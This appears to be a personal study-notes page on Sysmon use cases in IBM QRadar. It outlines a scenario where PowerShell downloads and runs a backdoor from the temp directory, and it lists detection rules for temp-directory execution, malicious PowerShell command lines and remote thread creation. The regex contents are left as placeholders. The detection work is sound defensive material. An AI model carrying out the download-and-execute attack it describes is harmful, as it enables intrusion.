Sysmon Usecases (IBM)

Introduction

  • Sysmon is a tool that provides extra visibility on the Windows logs especially when it comes to things that aren't usually captured through normal logs. For example, code injection, PowerShell commands, process mitigation, etc..

Use Case 01 - Malicious File Injection and Execution

Scenario:

  • An attacker uses a PowerShell script that downloads a malicious backdoor and runs it from the temp directory.

Red Flags:

  • The process started from a temp directory.

  • Unsigned exe or dll.

  • PowerShell commands that download and start processes.

Rules:

Unsigned Executable or DLL Loaded from Temp Directory

  • Events which are detected by the local system.

  • Events were detected by one or more of Microsoft Windows Security Event Log.

  • Event QID is one of the following (5001844) Image Loaded.

  • When the event matches LoadedImage (custom) matches any of expressions <Temp Directory Path Regex>

Process Launched from Temp Directory

  • Events which are detected by the local system.

  • Events were detected by one or more of Microsoft Windows Security Event Log.

  • Event QID is one of the following (5001828) Process Create

  • Event matches Image (custom) matches any of expressions <Temp Directory Path Regex>

Powershell Malicious Usage Detected

  • Events which are detected by the local system.

  • Events were detected by one or more of Microsoft Windows Security Event Log.

  • Event QID is one of the following (5001828) Process Create

  • Event matches Process CommandLine (custom) is not NA.

  • Event matches Process CommandLine (custom) matches <Malicious Commands Regex> (Make sure to make it case insensitive and to escape useless characters to detect bypassing activities)

Process Created a Thread into System Process

  • Events which are detected by the local system.

  • Events were detected by one or more of Microsoft Windows Security Event Log.

  • Event QID is one of the following (5001845) CreateRemote Thread

  • Event matches Process CommandLine (custom) is not NA.

  • Any of Target Image Name (Custom) is contained in any of Windows Sensitive Processes (Reference Set that includes the sensitive Windows processes)

PreviousArchive/Backup/BinNextLinux Fundamentals (TryHackMe)

Last updated